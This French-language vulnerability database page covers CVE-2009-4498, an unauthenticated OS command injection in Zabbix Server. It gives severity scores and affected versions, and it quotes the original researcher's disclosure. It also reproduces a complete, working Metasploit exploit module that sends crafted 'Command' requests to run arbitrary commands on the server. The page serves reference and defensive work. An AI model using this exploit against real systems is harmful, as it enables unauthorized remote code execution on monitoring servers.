CVE-2009-4498 : Détail

CVE-2009-4498

OS Command Injection
A03-Injection
67.47%V3
Network
2009-12-31
17h00 +00:00
2010-04-30
07h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The node_process_command function in Zabbix Server before 1.8 allows remote attackers to execute arbitrary commands via a crafted request.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 20796

Date de publication : 2012-08-26 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Zabbix Server Arbitrary Command Execution', 'Description' => %q{ This module abuses the "Command" trap in Zabbix Server to execute arbitrary commands without authentication. By default the Node ID "0" is used, if it doesn't work, the Node ID is leaked from the error message and exploitation retried. According to the vendor versions prior to 1.6.9 are vulnerable. The vulnerability has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04. }, 'Author' => [ 'Nicob <nicob[at]nicob.net>', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2009-4498' ], [ 'OSVDB', '60965' ], [ 'BID', '37989' ], [ 'EDB', '10432' ], [ 'URL', 'https://support.zabbix.com/browse/ZBX-1030' ] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet', # *_perl, *_python and *_ruby work if they are installed } }, 'Targets' => [ [ 'Zabbix 1.6.7', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 10 2009' )) register_options( [ Opt::RPORT(10051), ], self.class) end def send_command(sock, node_id, cmd) host_id = Rex::Text.rand_text_numeric(3) msg = "Command\255" msg << "#{node_id}\255" msg << "#{host_id}\255" msg << "#{cmd}\n" sock.put(msg) res = sock.get_once return res end def check peer = "#{rhost}:#{rport}" node_id = 0 clue = Rex::Text.rand_text_alpha(rand(5)+5) cmd = "echo #{clue}" connect print_status("#{peer} - Sending 'Command' request...") res = send_command(sock, node_id, cmd) disconnect if res print_status(res) if res =~ /#{clue}/ return Exploit::CheckCode::Vulnerable elsif res =~ /-1/ and res=~ /NODE (\d*)/ node_id = $1 print_good("#{peer} - Node ID #{node_id} discovered") else return Exploit::CheckCode::Safe end else # No response return Exploit::CheckCode::Safe end # Retry with the good node_id connect print_status("#{peer} - Sending 'Command' request with discovered Node ID...") res = send_command(sock, node_id, cmd) disconnect if res and res =~ /#{clue}/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit peer = "#{rhost}:#{rport}" node_id = 0 cmd = payload.encoded connect print_status("#{peer} - Sending 'Command' request...") res = send_command(sock, node_id, cmd) disconnect if res and res =~ /-1/ and res=~ /NODE (\d*)/ # Retry with the good node_id node_id = $1 print_good("#{peer} - Node ID #{node_id} discovered") connect print_status("#{peer} - Sending 'Command' request with discovered Node ID...") res = send_command(sock, node_id, cmd) disconnect end # Read command output from socket if cmd/unix/generic payload was used if (datastore['CMD']) if res and res =~ /\x30\xad/ print_good("#{peer} - Command executed successfully") print_status("Output:\n#{res.split("\x30\xad").last}") else print_error("#{peer} - Failed to execute the command") end end end end
Exploit Database EDB-ID : 10432

Date de publication : 2009-12-13 23h00 +00:00
Auteur : Nicob
EDB Vérifié : Yes

Zabbix Server : Multiple remote vulnerabilities From: Nicob <nicob () nicob net> Date: Sun, 13 Dec 2009 16:28:35 +0100 From Wikipedia : "Zabbix is a network management system application [...] designed to monitor and track the status of various network services, servers, and other network hardware." [Zabbix Server : Remote command execution] Impacted software : Zabbix Server Zabbix reference : https://support.zabbix.com/browse/ZBX-1030 Patched version : 1.8 Faulty source code : function node_process_command() in zabbix_server/trapper/nodecommand.c Changelog entry : fixed security vulnerability in server allowing remote unauthenticated users to execute scripts [Zabbix Server : Remote SQL execution] Impacted software : Zabbix Server Zabbix reference : https://support.zabbix.com/browse/ZBX-1031 Patched version : 1.6.8 (patch for 1.6.7 was insufficient) Faulty source code : function send_history_last_id() in zabbix_server/trapper/nodehistory.c Changelog entry (1.6.7) : fixed security vulnerability in server, allowing remote unauthenticated users to execute arbitrary SQL queries Changelog entry (1.6.8) : added more security checks for communication between nodes [Zabbix Server : Remote DoS (NULL deref)] Impacted software : Zabbix Server Zabbix reference : https://support.zabbix.com/browse/ZBX-993 Patched version : 1.6.6 Faulty source code : function process_trap() in zabbix_server/trapper/trapper.c Changelog entry : fixed possible vulnerability of trapper [Zabbix Server : Remote DoS (NULL deref)] Impacted software : Zabbix Server Zabbix reference : https://support.zabbix.com/browse/ZBX-1355 Patched version : 1.6.8 Faulty source code : function zbx_get_next_field() in libs/zbxcommon/str.c Changelog entry : fixed possible server crash when receiving invalid data

Products Mentioned

Configuraton 0

Zabbix>>Zabbix >> Version To (including) 1.7.4

Zabbix>>Zabbix >> Version 1.1.2

Zabbix>>Zabbix >> Version 1.1.3

Zabbix>>Zabbix >> Version 1.1.4

Zabbix>>Zabbix >> Version 1.1.5

Zabbix>>Zabbix >> Version 1.4.2

Zabbix>>Zabbix >> Version 1.4.3

Zabbix>>Zabbix >> Version 1.6.6

Zabbix>>Zabbix >> Version 1.6.7

Zabbix>>Zabbix >> Version 1.6.8

Zabbix>>Zabbix >> Version 1.7

Zabbix>>Zabbix >> Version 1.7.1

Zabbix>>Zabbix >> Version 1.7.2

Zabbix>>Zabbix >> Version 1.7.3

Références

http://www.openwall.com/lists/oss-security/2010/04/02/1
Tags : mailing-list, x_refsource_MLIST
http://secunia.com/advisories/37740
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2009/3514
Tags : vdb-entry, x_refsource_VUPEN